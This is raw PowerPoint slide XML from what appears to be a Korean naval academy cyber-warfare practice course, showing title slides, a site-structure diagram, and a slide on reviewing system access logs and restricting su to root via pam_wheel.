<file path=ppt/slides/_rels/slide45.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www.kitribob.kr/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kitribob.wiki/wiki/%EB%B0%B1%EB%8F%84%EC%9A%B0" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide50.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 Target="slide61.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide36.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide58.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide68.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide65.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide62.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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slide" Target="slide57.xm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slide" Target="slide36.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3.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36.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slide" Target="slide3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 Target="slide36.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide71.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slide" Target="slide36.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7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 Target="slide36.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76.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1.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:\Users\arizona\Desktop\GIT\CyberTraining\Lecture\Content\ItCS\calendar.php-61.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide36.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7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 Target="slide36.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ieeexplore.ieee.org/document/8999252" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId4"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openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:\Users\arizona\Desktop\GIT\CyberTraining\Lecture\Content\ItCS\calendar.php-55.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide36.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8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 Target="slide36.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8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1.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:\Users\arizona\Desktop\GIT\CyberTraining\Lecture\Content\ItCS\calendar.php-56.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide36.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84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///C:\Users\arizona\Desktop\GIT\CyberTraining\Lecture\Content\ItCS\calendar.php-59.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide36.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85.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slide" Target="slide161.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide87.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87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide86.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide157.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide152.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide88.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide101.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide125.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide90.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide99.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide119.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide87.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide89.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide148.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide97.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide112.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide94.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide142.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide105.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide92.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide103.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide135.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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slide" Target="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88.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9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slide" Target="slide88.xml"/><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9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88.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9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slide" Target="slide8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88.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9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slide" Target="slide88.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9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slide" Target="slide88.xm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png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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88.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9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 Target="slide88.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99.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88.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90E61B-2259-459B-B631-B6F586300E50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사이버전실습</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4B9020A-949D-434C-B341-DB64D1EDEBE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3844212"/>
            <a:ext cx="9144000" cy="1413588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>해군사관학교</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3782619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2603AEEE-E066-4071-8E11-2AE63AB67F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8423342" y="1986245"/>
            <a:ext cx="3080691" cy="1634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en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 구성</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5E7CD1D-F5FF-4ABA-9E73-3D172D994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310" y="2694220"/>
            <a:ext cx="864636" cy="6484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5287CE2E-9131-4A0F-8543-6C4A452336F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414865" y="3466588"/>
            <a:ext cx="659366" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Intro</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E796E03F-61A7-40DC-BA17-AF73DFFFD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521" y="3898255"/>
            <a:ext cx="864636" cy="64847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연결선: 꺾임 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6EC7EF5-A46A-478B-8D41-3FBD4DFDB05E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1028" idx="2"/>
            <a:endCxn id="41" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4077676" y="3600648"/>
            <a:ext cx="879797"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9CC3AA25-EF85-44B6-968F-E5300BA47845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1028" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4392584" y="3285740"/>
            <a:ext cx="249981"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56E398F-71D9-4FAB-988A-926A9C500451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584438" y="2873899"/>
            <a:ext cx="659366" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="TextBox 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBB7F8D7-8340-4973-BF35-3BEA659EDB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5424191" y="4077743"/>
            <a:ext cx="659366" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Plan</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E293B761-0092-4B20-A409-D5212F571BEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6158203" y="4698420"/>
            <a:ext cx="1371605"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/Inforsec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9267494F-BB27-4E5A-BD9B-2112A32B6842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156641" y="5382410"/>
            <a:ext cx="1527119"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/Defcybsec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="연결선: 꺾임 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F68E2506-39E6-4C14-BD77-6211109077E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5126850" y="4551720"/>
            <a:ext cx="373870" cy="363893"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99914"/>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75094738-9D18-4B52-B89A-EBABB72AC249}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4808116" y="4870455"/>
            <a:ext cx="989567" cy="342120"/>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5E4120-B6AF-4C85-BB97-7FEA51BA2374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6068005" y="5963139"/>
            <a:ext cx="461665" cy="648477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>… …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="직선 화살표 연결선 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFEBF4B5-8580-440F-B17A-5D028EB02B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="40" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6074231" y="3163210"/>
            <a:ext cx="1903447" cy="45726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문서 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DF887C0-C82E-44FB-B4BA-DDF6538BF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5935" y="327530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그림 1035">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBA31C24-D96A-4656-9812-0AAD09779AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8657519" y="4743760"/>
            <a:ext cx="2710626"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7" name="직선 화살표 연결선 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2719489B-3E22-4811-9040-B735E31E7350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="49" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083557" y="4231632"/>
            <a:ext cx="2407304" cy="51212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10" descr="문서 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D24071E-C01F-4A53-8413-CAD834AE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616" y="4560958"/>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문서 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06DA7752-46CB-4B0D-9A3A-C3082E582D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732" y="519638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그림 1039">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{603C50B6-2E5A-45AF-9C5D-6211738D906B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="378904" y="3674359"/>
            <a:ext cx="2879373" cy="1758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4" name="직선 화살표 연결선 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF59DC73-C402-480B-AD63-14F70DF69BE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3362837" y="3181676"/>
            <a:ext cx="538256" cy="41100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말풍선: 모서리가 둥근 사각형 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AACA186-B671-4601-A1BA-6CB55F16DB4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4942110" y="3050517"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05892AB-E9CE-4C44-B497-979560A8FDF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060241" y="2357071"/>
            <a:ext cx="3123922" cy="1649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말풍선: 모서리가 둥근 사각형 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEF8D085-E500-41A4-A7D9-B39E716F193A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8720305" y="1690688"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33070609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시스템 접속 로그 점검</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a:t>원격에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정 접속 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>명령으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정으로 전환함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용 제한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dirty="0" err="1"/>
              <a:t>pam.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>auth required </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>pam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>_wheel</a:t>
            </a:r>
            <a:r>
